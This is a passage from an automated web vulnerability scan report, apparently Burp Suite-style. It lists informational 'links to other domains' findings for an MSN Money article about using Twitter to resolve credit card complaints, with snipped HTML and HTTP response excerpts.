<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410115&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<cite>By <a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew">CreditCards.com</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew"><img src="http://colstb.msn.com/i/7E/1944B57464FBD948FCCE16DB38BB4.jpg" width="120" height="30" alt="CreditCards.com on MSN Money" />
...[SNIP]...
<p>Why wait on endless hold to dispute a credit card fee over the phone when you can post your complaint on <a class="opennew" href="http://www.twitter.com/">Twitter</a>
...[SNIP]...
<p>Most major banks in the United States, including <a class="opennew" href="http://www.bing.com/search?q=wells+fargo&form=MSMONY">Wells Fargo</a>, <a class="opennew" href="http://www.bing.com/search?q=bank+of+america&form=MSMONY">Bank of America</a> and <a class="opennew" href="http://www.bing.com/search?q=citi&form=MSMONY">Citi</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY" class="opennew"><img src="http://moneycentral.redacted/content/data/images/Thumbnail/bingLogo-60.gif" width="60" height="27" alt="Search for personal finance on Twitter on Bing" class="img1" />
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY" class="opennew">Personal finance on Twitter</a>
...[SNIP]...
messages can be helpful. "Customer service is one of the most logical and valuable uses of Twitter," says Christophe Langlois, who tracks the social media use of financial institutions on the website <a class="opennew" href="http://www.Visible-Banking.com/">Visible-Banking</a>
...[SNIP]...
<p>Like most major financial institutions, MasterCard has channels on Twitter and <a class="opennew" href="http://www.facebook.com/">Facebook</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1" class="opennew">How to dispute a credit card bill with a merchant</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1" class="opennew">How to change financial bad habits in 8 steps </a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1" class="opennew">Credit card foreign transaction fees going up </a>
...[SNIP]...
trlBinary', 'True','1');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ary', 'True','0');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XOztDHmYtNsLgsi3J70SuxV6ufY2pIO8h?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&domain=en-US">MARK WITT
..(SUPERSONIC1)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/static/16" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-N4L5e1Iiimc9fZcIIHXPa6g7EHfXCf-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-N4L5e1Iiimc9fZcIIHXPa6g7EHfXCf-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
, [ALITALIA]  I am still without my money. Tell me, am I expected to be courteous after 16 letters, 17 phone calls, (15 were overseas), and 24 emails? Please do advise and have a very nice day ; )<img src="http://us.social.s-redacted/s/images/emoticons/regular_smile.gif" alt="Smile" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xv3Z740NyrClWi1ZVK-YSnMVUDX9ujh9d?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCVWVNin8ahOnxbu6CkILsHwH9Nb0iHEA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4Qa8-uoUmEQdtynN8UHyDsm0Gf4yux_w?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhHKEEqDclSE9c3w1kYC384bKtOH8c9QD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xy9lyrB9uNmQYnrDXykw1bou-4mmDzNFp?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPfeT1kpYS7Wn-RcQ1SZR5hEkyQXJ2qN6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHbIFZX69e-qNzxvkIyimvEbvjpCVpW6S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGoG-LEpQfUy6k-KMKBYowSsHdlMkNkJh?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.186. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://us.social.s-msn.com/s/images/emoticons/regular_smile.gif
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3
http://www.bing.com/search?q=bank+of+america&form=MSMONY
http://www.bing.com/search?q=citi&form=MSMONY
http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3
http://www.bing.com/search?q=perfect+credit+score&form=money3
http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY
http://www.bing.com/search?q=wells+fargo&form=MSMONY
http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3
http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.creditcards.com/?aid=46bf5df1
http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1
http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1
http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1
http://www.delish.com/
http://www.facebook.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.twitter.com/
http://www.visible-banking.com/
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406259&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=453669d26c8f4551bf1ae57a282e1e73; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:50:59 GMT
Content-Length: 114371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406259&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<cite>By <a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew">CreditCards.com</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew"><img src="http://colstb.msn.com/i/7E/1944B57464FBD948FCCE16DB38BB4.jpg" width="120" height="30" alt="CreditCards.com on MSN Money" />
...[SNIP]...
<p>Why wait on endless hold to dispute a credit card fee over the phone when you can post your complaint on <a class="opennew" href="http://www.twitter.com/">Twitter</a>
...[SNIP]...
<p>Most major banks in the United States, including <a class="opennew" href="http://www.bing.com/search?q=wells+fargo&form=MSMONY">Wells Fargo</a>, <a class="opennew" href="http://www.bing.com/search?q=bank+of+america&form=MSMONY">Bank of America</a> and <a class="opennew" href="http://www.bing.com/search?q=citi&form=MSMONY">Citi</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY" class="opennew"><img src="http://moneycentral.redacted/content/data/images/Thumbnail/bingLogo-60.gif" width="60" height="27" alt="Search for personal finance on Twitter on Bing" class="img1" />
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY" class="opennew">Personal finance on Twitter</a>
...[SNIP]...
messages can be helpful. "Customer service is one of the most logical and valuable uses of Twitter," says Christophe Langlois, who tracks the social media use of financial institutions on the website <a class="opennew" href="http://www.Visible-Banking.com/">Visible-Banking</a>
...[SNIP]...
<p>Like most major financial institutions, MasterCard has channels on Twitter and <a class="opennew" href="http://www.facebook.com/">Facebook</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1" class="opennew">How to dispute a credit card bill with a merchant</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1" class="opennew">How to change financial bad habits in 8 steps </a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1" class="opennew">Credit card foreign transaction fees going up </a>
...[SNIP]...
rue','1');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
0');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XOztDHmYtNsLgsi3J70SuxV6ufY2pIO8h?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&domain=en-US">MARK WITT
..(SUPERSONIC1)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/static/16" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-N4L5e1Iiimc9fZcIIHXPa6g7EHfXCf-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-N4L5e1Iiimc9fZcIIHXPa6g7EHfXCf-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
, [ALITALIA]  I am still without my money. Tell me, am I expected to be courteous after 16 letters, 17 phone calls, (15 were overseas), and 24 emails? Please do advise and have a very nice day ; )<img src="http://us.social.s-redacted/s/images/emoticons/regular_smile.gif" alt="Smile" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xv3Z740NyrClWi1ZVK-YSnMVUDX9ujh9d?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCVWVNin8ahOnxbu6CkILsHwH9Nb0iHEA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4Qa8-uoUmEQdtynN8UHyDsm0Gf4yux_w?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhHKEEqDclSE9c3w1kYC384bKtOH8c9QD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xy9lyrB9uNmQYnrDXykw1bou-4mmDzNFp?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPfeT1kpYS7Wn-RcQ1SZR5hEkyQXJ2qN6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHbIFZX69e-qNzxvkIyimvEbvjpCVpW6S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGoG-LEpQfUy6k-KMKBYowSsHdlMkNkJh?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.187. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
